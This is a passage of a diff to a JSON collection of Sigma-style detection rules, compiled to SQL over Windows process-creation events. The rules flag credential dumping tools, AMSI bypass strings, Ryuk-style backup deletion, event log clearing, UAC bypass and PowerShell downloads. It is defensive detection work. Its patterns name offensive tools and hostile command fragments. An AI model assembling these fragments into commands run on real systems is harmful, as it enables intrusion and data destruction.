LIKE 'C:\\\\WINDOWS\\\\system32\\\\cmd.exe /c \"%' ESCAPE '\\' AND CurrentDirectory LIKE '%C:\\\\WINDOWS\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\Temp%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\invcol.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\ProgramData\\\\Dell\\\\UpdateService\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\' AND ParentProcessName LIKE '%\\\\CompatTelRunner.exe' ESCAPE '\\' AND ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\CompatTelRunner.exe -m:appraiser.dll -f:DoScheduledTelemetryRun%' ESCAPE '\\') OR (ParentProcessName LIKE 'C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\IBM\\\\SpectrumProtect\\\\webserver\\\\scripts\\\\%' ESCAPE '\\') OR (CommandLine = 'powershell.exe -ExecutionPolicy Restricted -Command Write-Host ''Final result: 1'';') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%/d /c C:\\\\Windows\\\\system32\\\\silcollector.cmd%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND (CommandLine LIKE '%cmd.exe /c btool server list replication\\_port --no-log' ESCAPE '\\' OR CommandLine LIKE '%cmd.exe /c btool server list general --no-log' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\system32\\\\reg.exe query hklm\\\\software\\\\microsoft\\\\windows\\\\softwareinventorylogging /v collectionstate /reg:64%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\cmd.exe' ESCAPE '\\' AND CommandLine LIKE 'C:\\\\Windows\\\\system32\\\\cmd.exe /c PAUSE' ESCAPE '\\')))" ], - "filename": "proc_creation_win_ping_hex_ip.yml" + "filename": "proc_creation_win_susp_elevated_system_shell.yml" }, { - "title": "Potential ACTINIUM Persistence Activity", - "id": "e1118a8f-82f5-44b3-bb6b-8a284e5df602", - "status": "test", - "description": "Detects specific process parameters as used by ACTINIUM scheduled task persistence creation.", - "author": "Andreas Hunkeler (@Karneades)", + "title": "Potential Persistence Via Powershell Search Order Hijacking - Task", + "id": "b66474aa-bd92-4333-a16c-298155b120df", + "status": "experimental", + "description": "Detects suspicious powershell execution via a schedule task where the command ends with an suspicious flags to hide the powershell instance instead of executeing scripts or commands. This could be a sign of persistence via PowerShell \"Get-Variable\" technique as seen being used in Colibri Loader", + "author": "pH-T (Nextron Systems), Florian Roth (Nextron Systems)", "tags": [ + "attack.execution", "attack.persistence", - "attack.t1053", - "attack.t1053.005" + "attack.t1053.005", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%schtasks%' ESCAPE '\\' AND CommandLine LIKE '%create%' ESCAPE '\\' AND CommandLine LIKE '%wscript%' ESCAPE '\\' AND CommandLine LIKE '% /e:vbscript%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE 'C:\\\\WINDOWS\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k netsvcs%' ESCAPE '\\' AND ParentCommandLine LIKE '%-s Schedule%' ESCAPE '\\' AND (CommandLine LIKE '% -windowstyle hidden' ESCAPE '\\' OR CommandLine LIKE '% -w hidden' ESCAPE '\\' OR CommandLine LIKE '% -ep bypass' ESCAPE '\\' OR CommandLine LIKE '% -noni' ESCAPE '\\'))" ], - "filename": "proc_creation_win_apt_actinium_persistence.yml" + "filename": "proc_creation_win_schtasks_powershell_persistence.yml" }, { - "title": "Suspicious Eventlog Clear or Configuration Change", - "id": "cc36992a-4671-4f21-a91d-6c2b72a2edf5", - "status": "stable", - "description": "Detects clearing or configuration of eventlogs using wevtutil, powershell and wmic. Might be used by ransomwares during the attack (seen by NotPetya and others).", - "author": "Ecco, Daniil Yugoslavskiy, oscd.community, D3F7A5105", + "title": "Disable Important Scheduled Task", + "id": "9ac94dc8-9042-493c-ba45-3b5e7c86b980", + "status": "experimental", + "description": "Detects when adversaries stop services or processes by disabling their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "attack.t1562.002", - "car.2016-04-002" + "attack.impact", + "attack.t1489" ], "falsepositives": [ - "Admin activity", - "Scripts and administrative tools used in the monitored environment", - "Maintenance activity" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\wevtutil.exe' ESCAPE '\\' AND (CommandLine LIKE '%clear-log %' ESCAPE '\\' OR CommandLine LIKE '% cl %' ESCAPE '\\' OR CommandLine LIKE '%set-log %' ESCAPE '\\' OR CommandLine LIKE '% sl %' ESCAPE '\\' OR CommandLine LIKE '%lfn:%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND (CommandLine LIKE '%Clear-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Remove-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Limit-EventLog %' ESCAPE '\\' OR CommandLine LIKE '%Clear-WinEvent %' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND CommandLine LIKE '% ClearEventLog %' ESCAPE '\\')) AND NOT (((ParentProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\msiexec.exe' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\msiexec.exe' ESCAPE '\\') AND CommandLine LIKE '% sl %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND CommandLine LIKE '%/Change%' ESCAPE '\\' AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%/disable%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_eventlog_clear.yml" + "filename": "proc_creation_win_schtasks_disable.yml" }, { - "title": "Potential AMSI Bypass Via .NET Reflection", - "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "title": "Explorer NOUACCHECK Flag", + "id": "534f2ef7-e8a2-4433-816d-c91bccde289b", "status": "test", - "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", - "author": "Markus Neis, @Kostastsale", + "description": "Detects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1548.002" ], "falsepositives": [ - "Unlikely" + "Domain Controller User Logon", + "Unknown how many legitimate software products use that method" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%/NOUACCHECK%' ESCAPE '\\') AND NOT ((ParentCommandLine LIKE 'C:\\\\Windows\\\\system32\\\\svchost.exe -k netsvcs -p -s Schedule' ESCAPE '\\' OR ParentProcessName LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" + "filename": "proc_creation_win_explorer_nouaccheck.yml" }, { - "title": "HackTool - Impacket Tools Execution", - "id": "4627c6ae-6899-46e2-aa0c-6ebcb1becd19", - "status": "test", - "description": "Detects the execution of different compiled Windows binaries of the impacket toolset (based on names or part of their names - could lead to false positives)", - "author": "Florian Roth (Nextron Systems)", + "title": "Potential Defense Evasion Via Right-to-Left Override", + "id": "ad691d92-15f2-4181-9aa4-723c74f9ddc3", + "status": "experimental", + "description": "Detects the presence of the \"u202+E\" character, which causes a terminal, browser, or operating system to render text in a right-to-left sequence.\nThis is used as an obfuscation and masquerading techniques.\n", + "author": "Micah Babinski, @micahbabinski", "tags": [ - "attack.execution", - "attack.t1557.001" + "attack.defense_evasion", + "attack.t1036.002" ], "falsepositives": [ - "Legitimate use of the impacket tools" + "Commandlines that contains scriptures such as arabic or hebrew might make use of this character" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\goldenPac%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\karmaSMB%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\kintercept%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ntlmrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rpcdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\samrdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\secretsdump%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbrelayx%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmiexec%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\wmipersist%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\atexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dcomexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dpapi\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\findDelegation\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetADUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetNPUsers\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getPac\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getST\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\getTGT\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\GetUserSPNs\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ifmap\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\mimikatz\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netview\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\nmapAnswerMachine\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\opdump\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\psexec\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rdp\\_check\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sambaPipe\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbclient\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\smbserver\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniffer\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\sniff\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\split\\_windows.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ticketer\\_windows.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%‮%' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_impacket_tools.yml" + "filename": "proc_creation_win_susp_right_to_left_override.yml" }, { - "title": "Interactive AT Job", - "id": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "status": "test", - "description": "Detects an interactive AT job, which may be used as a form of privilege escalation.", - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", + "title": "Potential Ryuk Ransomware Activity", + "id": "c37510b8-2107-4b78-aa32-72f251e7a844", + "status": "stable", + "description": "Detects Ryuk ransomware activity", + "author": "Florian Roth (Nextron Systems), Vasiliy Burov, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Unlikely (at.exe deprecated as of Windows 8)" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\at.exe' ESCAPE '\\' AND CommandLine LIKE '%interactive%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\users\\\\Public\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%del /s /f /q c:\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bac%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bak%' ESCAPE '\\' AND CommandLine LIKE '%\\*.bkf%' ESCAPE '\\') OR ((NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\') AND CommandLine LIKE '% stop %' ESCAPE '\\' AND CommandLine LIKE '% /y%' ESCAPE '\\' AND (CommandLine LIKE '%samss%' ESCAPE '\\' OR CommandLine LIKE '%audioendpointbuilder%' ESCAPE '\\' OR CommandLine LIKE '%unistoresvc\\_%' ESCAPE '\\' OR CommandLine LIKE '%AcrSch2Svc%' ESCAPE '\\'))))" ], - "filename": "proc_creation_win_at_interactive_execution.yml" + "filename": "proc_creation_win_malware_ryuk.yml" }, { - "title": "HackTool - Pypykatz Credentials Dumping Activity", - "id": "a29808fd-ef50-49ff-9c7a-59a9b040b404", - "status": "test", - "description": "Detects the usage of \"pypykatz\" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored", - "author": "frack113", + "title": "Set Suspicious Files as System Files Using Attrib.EXE", + "id": "efec536f-72e8-4656-8960-5e85d091345b", + "status": "experimental", + "description": "Detects the usage of attrib with the \"+s\" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.defense_evasion", + "attack.t1564.001" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (NewProcessName LIKE '%\\\\pypykatz.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\python.exe' ESCAPE '\\') AND CommandLine LIKE '%live%' ESCAPE '\\' AND CommandLine LIKE '%registry%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\attrib.exe' ESCAPE '\\' OR OriginalFileName = 'ATTRIB.EXE') AND CommandLine LIKE '% +s%' ESCAPE '\\' AND (CommandLine LIKE '% \\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') AND (CommandLine LIKE '%.bat%' ESCAPE '\\' OR CommandLine LIKE '%.dll%' ESCAPE '\\' OR CommandLine LIKE '%.exe%' ESCAPE '\\' OR CommandLine LIKE '%.hta%' ESCAPE '\\' OR CommandLine LIKE '%.ps1%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\')) AND NOT (CommandLine LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.exe%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_hktl_pypykatz.yml" + "filename": "proc_creation_win_attrib_system_susp_paths.yml" }, { - "title": "Root Certificate Installed From Susp Locations", - "id": "5f6a601c-2ecb-498b-9c33-660362323afa", - "status": "experimental", - "description": "Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "HackTool - Bloodhound/Sharphound Execution", + "id": "f376c8a7-a2d0-4ddc-aa0c-16c17236d962", + "status": "test", + "description": "Detects command line parameters used by Bloodhound and Sharphound hack tools", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1553.004" + "attack.discovery", + "attack.t1087.001", + "attack.t1087.002", + "attack.t1482", + "attack.t1069.001", + "attack.t1069.002", + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ - "Unlikely" + "Other programs that use these command line option and accepts an 'All' parameter" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%Import-Certificate%' ESCAPE '\\' AND CommandLine LIKE '% -FilePath %' ESCAPE '\\' AND CommandLine LIKE '%Cert:\\\\LocalMachine\\\\Root%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Perflogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((Product LIKE '%SharpHound%' ESCAPE '\\' OR Description LIKE '%SharpHound%' ESCAPE '\\' OR (Company LIKE '%SpecterOps%' ESCAPE '\\' OR Company LIKE '%evil corp%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\Bloodhound.exe%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\SharpHound.exe%' ESCAPE '\\')) OR (CommandLine LIKE '% -CollectionMethod All %' ESCAPE '\\' OR CommandLine LIKE '% --CollectionMethods Session %' ESCAPE '\\' OR CommandLine LIKE '% --Loop --Loopduration %' ESCAPE '\\' OR CommandLine LIKE '% --PortScanTimeout %' ESCAPE '\\' OR CommandLine LIKE '%.exe -c All -d %' ESCAPE '\\' OR CommandLine LIKE '%Invoke-Bloodhound%' ESCAPE '\\' OR CommandLine LIKE '%Get-BloodHoundData%' ESCAPE '\\') OR (CommandLine LIKE '% -JsonFolder %' ESCAPE '\\' AND CommandLine LIKE '% -ZipFileName %' ESCAPE '\\') OR (CommandLine LIKE '% DCOnly %' ESCAPE '\\' AND CommandLine LIKE '% --NoSaveCache %' ESCAPE '\\')))" ], - "filename": "proc_creation_win_powershell_import_cert_susp_locations.yml" + "filename": "proc_creation_win_hktl_bloodhound_sharphound.yml" }, { - "title": "Suspicious WERMGR Process Patterns", - "id": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e", - "status": "experimental", - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", - "author": "Florian Roth (Nextron Systems)", + "title": "UAC Bypass Abusing Winsat Path Parsing - Process", + "id": "7a01183d-71a2-46ad-ad5c-acd989ac1793", + "status": "test", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((ParentProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\nslookup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\ipconfig.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\net1.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\whoami.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\netstat.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\systeminfo.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\cmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\')) OR (NewProcessName LIKE '%\\\\wermgr.exe' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\')))))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND IntegrityLevel IN ('High', 'System') AND ParentProcessName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\system32\\\\winsat.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%C:\\\\Windows \\\\system32\\\\winsat.exe%' ESCAPE '\\')" ], - "filename": "proc_creation_win_wermgr_susp_child_process.yml" + "filename": "proc_creation_win_uac_bypass_winsat.yml" }, { - "title": "Suspicious Curl.EXE Download", - "id": "e218595b-bbe7-4ee5-8a96-f32a24ad3468", + "title": "Suspicious Mstsc.EXE Execution With Local RDP File", + "id": "6e22722b-dfb1-4508-a911-49ac840b40f8", "status": "experimental", - "description": "Detects a suspicious curl process start on Windows and outputs the requested document to a local file", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects potential RDP connection via Mstsc using a local \".rdp\" file located in suspicious locations.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.command_and_control", - "attack.t1105" + "attack.t1219" ], "falsepositives": [ - "Unknown" + "Likelihood is related to how often the paths are used in the environment" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\curl.exe' ESCAPE '\\' OR Product = 'The curl executable') AND ((CommandLine LIKE '%\\%AppData\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Public\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%Temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Desktop\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\PerfLogs\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\ProgramData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%C:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\') OR (CommandLine LIKE '%.dll' ESCAPE '\\' OR CommandLine LIKE '%.gif' ESCAPE '\\' OR CommandLine LIKE '%.jpeg' ESCAPE '\\' OR CommandLine LIKE '%.jpg' ESCAPE '\\' OR CommandLine LIKE '%.png' ESCAPE '\\' OR CommandLine LIKE '%.temp' ESCAPE '\\' OR CommandLine LIKE '%.tmp' ESCAPE '\\' OR CommandLine LIKE '%.txt' ESCAPE '\\' OR CommandLine LIKE '%.vbe' ESCAPE '\\' OR CommandLine LIKE '%.vbs' ESCAPE '\\'))) AND NOT ((ParentProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\usr\\\\bin\\\\sh.exe' ESCAPE '\\' AND NewProcessName LIKE 'C:\\\\Program Files\\\\Git\\\\mingw64\\\\bin\\\\curl.exe' ESCAPE '\\' AND CommandLine LIKE '%--silent --show-error --output %' ESCAPE '\\' AND CommandLine LIKE '%gfw-httpget-%' ESCAPE '\\' AND CommandLine LIKE '%AppData%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR OriginalFileName = 'mstsc.exe') AND (CommandLine LIKE '%.rdp' ESCAPE '\\' OR CommandLine LIKE '%.rdp\"' ESCAPE '\\') AND (CommandLine LIKE '%:\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\color%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\System32\\\\Tasks\\_Migrated %' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tasks\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%:\\\\Windows\\\\Tracing\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_curl_susp_download.yml" + "filename": "proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml" }, { - "title": "Disabled IE Security Features", - "id": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", - "status": "test", - "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", - "author": "Florian Roth (Nextron Systems)", + "title": "HackTool - SharpChisel Execution", + "id": "cf93e05e-d798-4d9e-b522-b0248dc61eaf", + "status": "experimental", + "description": "Detects usage of the Sharp Chisel via the commandline arguments", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.command_and_control", + "attack.t1090.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '% -name IEHarden %' ESCAPE '\\' AND CommandLine LIKE '% -value 0 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DEPOff %' ESCAPE '\\' AND CommandLine LIKE '% -value 1 %' ESCAPE '\\') OR (CommandLine LIKE '% -name DisableFirstRunCustomize %' ESCAPE '\\' AND CommandLine LIKE '% -value 2 %' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\SharpChisel.exe' ESCAPE '\\' OR Product = 'SharpChisel'))" ], - "filename": "proc_creation_win_powershell_disable_ie_features.yml" + "filename": "proc_creation_win_hktl_sharp_chisel.yml" }, { - "title": "MERCURY APT Activity", - "id": "a62298a3-1fe0-422f-9a68-ffbcbc5a123d", - "status": "experimental", - "description": "Detects suspicious command line patterns seen being used by MERCURY APT", + "title": "PowerShell DownloadFile", + "id": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "status": "test", + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.execution", "attack.t1059.001", - "attack.g0069" + "attack.command_and_control", + "attack.t1104", + "attack.t1105" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%-exec bypass -w 1 -enc%' ESCAPE '\\' AND CommandLine LIKE '%UwB0AGEAcgB0AC0ASgBvAGIAIAAtAFMAYwByAGkAcAB0AEIAbABvAGMAawAgAHsAKABzAGEAcABzACAAKAAiAHAA%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND CommandLine LIKE '%powershell%' ESCAPE '\\' AND CommandLine LIKE '%.DownloadFile%' ESCAPE '\\' AND CommandLine LIKE '%System.Net.WebClient%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_mercury.yml" + "filename": "proc_creation_win_powershell_susp_ps_downloadfile.yml" }, { - "title": "AADInternals PowerShell Cmdlets Execution - ProccessCreation", - "id": "c86500e9-a645-4680-98d7-f882c70c1ea3", + "title": "Console CodePage Lookup Via CHCP", + "id": "7090adee-82e2-4269-bd59-80691e7c6338", "status": 